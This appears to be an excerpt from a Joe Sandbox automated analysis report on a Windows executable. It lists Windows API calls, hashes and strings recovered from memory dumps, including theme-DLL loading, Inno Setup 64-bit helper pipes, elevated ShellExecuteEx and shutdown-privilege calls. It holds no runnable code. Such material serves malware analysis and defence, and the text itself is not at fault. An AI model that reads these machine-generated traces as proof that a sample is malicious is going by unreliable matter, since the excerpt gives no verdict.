                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast
                                                                          • String ID:
                                                                          • API String ID: 734332943-0
                                                                          • Opcode ID: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
                                                                          • Instruction ID: f3a0f6ff35c414572697f21b60dc386cc542920b113ac52c9a1142ed5c58418d
                                                                          • Opcode Fuzzy Hash: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
                                                                          • Instruction Fuzzy Hash: 54C04CA1B0010147DF00AAAED5C1A0763D85E4E2093144076B504CF206D6A9D8084A24
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(?,0042E335), ref: 0042E328
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
                                                                          • Instruction ID: 885b9387dc4d85ef1a6bcc41b3ac28186c42b97ac018e1411ad6f8b1d6607996
                                                                          • Opcode Fuzzy Hash: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
                                                                          • Instruction Fuzzy Hash: CFB09B7770C6006DB705DA95B45192D63E4D7C47203E14577F400D3580D93C58014918
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                          • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                          • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                          • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
                                                                          • Instruction ID: 72cb28a769613da0e12d57a8c8ff31d21ec4f608c404a89b028e4eccd5103e64
                                                                          • Opcode Fuzzy Hash: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
                                                                          • Instruction Fuzzy Hash: 87518570E041459FEB01EFA9C482AAEBBF5EB49304F51817BE500E7351DB389D46CB98
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                          • Instruction ID: b55a7b9a32de56e4c0cdb05f5aaeda5055a0700d8eb896d56cc2d0e0b2117302
                                                                          • Opcode Fuzzy Hash: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                          • Instruction Fuzzy Hash: F01148742007069BC710DF19C880B86FBE4EB98390B14C53BE9988B385D374E8598BA9
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,0045268D), ref: 0045266F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1452528299-0
                                                                          • Opcode ID: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                          • Instruction ID: 0a85f8cb76b48f87276e85e1927624e59cb24adfaf40460ac6081df001af0a23
                                                                          • Opcode Fuzzy Hash: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                          • Instruction Fuzzy Hash: BD0170356046446F8B10DF699C404EEF7F8DB4A3207208277FC64D3352DB745D099664
                                                                          APIs
                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 1263568516-0
                                                                          • Opcode ID: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                          • Instruction ID: 2f1b12c935ae24389c3dd8db424781fbbcf1746defe36878ea7ad6421184be39
                                                                          • Opcode Fuzzy Hash: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                          • Instruction Fuzzy Hash: 0C0170766043108FC3109F29DCC4E2677E8D780378F05413EDA84673A0D37A6C0187D9
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                          • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                          • Opcode Fuzzy Hash: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                          • Instruction Fuzzy Hash:
                                                                          APIs
                                                                            • Part of subcall function 0044AE58: GetVersionExA.KERNEL32(00000094), ref: 0044AE75
                                                                          • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004970B6), ref: 0044AED3
                                                                          • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                          • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                          • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B01D
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B02F
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B041
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B053
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B065
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B077
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B089
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B09B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0AD
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0BF
                                                                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B0D1
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B0E3
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B0F5
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B107
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B119
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B12B
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B13D
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B14F
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B161
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B173
                                                                          • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B185
                                                                          • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B197
                                                                          • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1A9
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1BB
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B1CD
                                                                          • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B1DF
                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B1F1
                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B203
                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B215
                                                                          • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B227
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoadVersion
                                                                          • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                          • API String ID: 1968650500-2910565190
                                                                          • Opcode ID: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                          • Instruction ID: a412a743d8d6f7d45af61582fe4c6e78a33dc70606a22357c48ac29c98de50d6
                                                                          • Opcode Fuzzy Hash: 58a82c8a34365b473289e4af6432c949e3c28b1c5dfbf877b155a0c5010eab07
                                                                          • Instruction Fuzzy Hash: 5991C9B0640B50EBEF00EFF598C6A2A36A8EB15B14714457BB444EF295D778C814CF9E
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00457D4F
                                                                          • QueryPerformanceCounter.KERNEL32(02333858,00000000,00457FE2,?,?,02333858,00000000,?,004586DE,?,02333858,00000000), ref: 00457D58
                                                                          • GetSystemTimeAsFileTime.KERNEL32(02333858,02333858), ref: 00457D62
                                                                          • GetCurrentProcessId.KERNEL32(?,02333858,00000000,00457FE2,?,?,02333858,00000000,?,004586DE,?,02333858,00000000), ref: 00457D6B
                                                                          • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457DE1
                                                                          • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02333858,02333858), ref: 00457DEF
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E37
                                                                          • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00457F8D,?,00000000,C0000000,00000000,00498AF0,00000003,00000000,00000000,00000000,00457F9E), ref: 00457E70
                                                                            • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
                                                                          • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F19
                                                                          • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00457F4F
                                                                          • CloseHandle.KERNEL32(000000FF,00457F94,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00457F87
                                                                            • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                          • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                          • API String ID: 770386003-3271284199
                                                                          • Opcode ID: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                          • Instruction ID: c70edaa48864fe3754a193870ded2551bb9409a03b77fa183b8e4c23b8ad21c8
                                                                          • Opcode Fuzzy Hash: 9bc676f9c34af54fa9c79b55e27a3e393b90950002bff594f479ab37992d8959
                                                                          • Instruction Fuzzy Hash: 66712270A043449EDB10DB69DC45B9EBBF5AB05705F1084BAF908FB283DB7859488F69
                                                                          APIs
                                                                            • Part of subcall function 00476E18: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02332BDC,?,?,?,02332BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E31
                                                                            • Part of subcall function 00476E18: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476E37
                                                                            • Part of subcall function 00476E18: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BDC,?,?,?,02332BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E4A
                                                                            • Part of subcall function 00476E18: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BDC,?,?,?,02332BDC), ref: 00476E74
                                                                            • Part of subcall function 00476E18: CloseHandle.KERNEL32(00000000,?,?,?,02332BDC,00476FDC,00000000,004770FA,?,?,-00000010,?), ref: 00476E92
                                                                            • Part of subcall function 00476EF0: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00476F82,?,?,?,02332BDC,?,00476FE4,00000000,004770FA,?,?,-00000010,?), ref: 00476F20
                                                                          • ShellExecuteEx.SHELL32(0000003C), ref: 00477034
                                                                          • GetLastError.KERNEL32(00000000,004770FA,?,?,-00000010,?), ref: 0047703D
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 0047708A
                                                                          • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 004770AE
                                                                          • CloseHandle.KERNEL32(00000000,004770DF,00000000,00000000,000000FF,000000FF,00000000,004770D8,?,00000000,004770FA,?,?,-00000010,?), ref: 004770D2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                          • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                          • API String ID: 883996979-221126205
                                                                          • Opcode ID: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                          • Instruction ID: 1ba95e0e0868ac7cc54db30065146fef24764d75c8f79a60f30d4c8031701125
                                                                          • Opcode Fuzzy Hash: cdfc9ed65273480b993f908da37bc8b157bd69d2ac5039e997c7e7ab6857fd80
                                                                          • Instruction Fuzzy Hash: 6F3162B0A04648AADB10EFAAC841ADEB7B9EF05314F90843BF508F7382D77C59048B59
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                          • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSendShowWindow
                                                                          • String ID:
                                                                          • API String ID: 1631623395-0
                                                                          • Opcode ID: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                          • Instruction ID: 39dda2673d0f757005a7c2ebbeab04d2226afc2b16c541db07efabb99d57c27a
                                                                          • Opcode Fuzzy Hash: 2c26266a8c67d7a7ed143539e2fbf203b7c134ad6664bcde8bffe5e01bbb34f6
                                                                          • Instruction Fuzzy Hash: 8B916171B04214BFD710EFA9DA86F9D77F4AB04314F5500B6F904AB3A2CB78AE409B58
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 004183A3
                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                          • GetWindowRect.USER32(?), ref: 004183DC
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                          • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                          • ScreenToClient.USER32(00000000), ref: 00418408
                                                                          • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                          • String ID: ,
                                                                          • API String ID: 2266315723-3772416878
                                                                          • Opcode ID: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                          • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                          • Opcode Fuzzy Hash: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                          • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 00454B0F
                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B15
                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00454B2E
                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B55
                                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B5A
                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00454B6B
                                                                          Strings
                                                                          Memory Dump Source
